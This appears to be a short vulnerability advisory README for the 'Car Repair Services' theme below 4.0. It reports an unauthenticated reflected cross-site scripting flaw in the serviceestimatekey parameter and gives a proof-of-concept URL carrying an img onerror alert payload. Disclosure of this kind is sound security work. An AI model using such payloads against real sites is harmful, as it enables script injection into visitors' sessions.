.. | |||
README.md | Loading last commit info... |
README.md
Car Repair Services < 4.0 - Unauthenticated Reflected XSS & XFS
Description
The theme did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
Proof of Concept
https://smartdata.tonytemplates.com/car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=<img+src%3Dx+onerror%3Dalert(`m0ze`)%3B>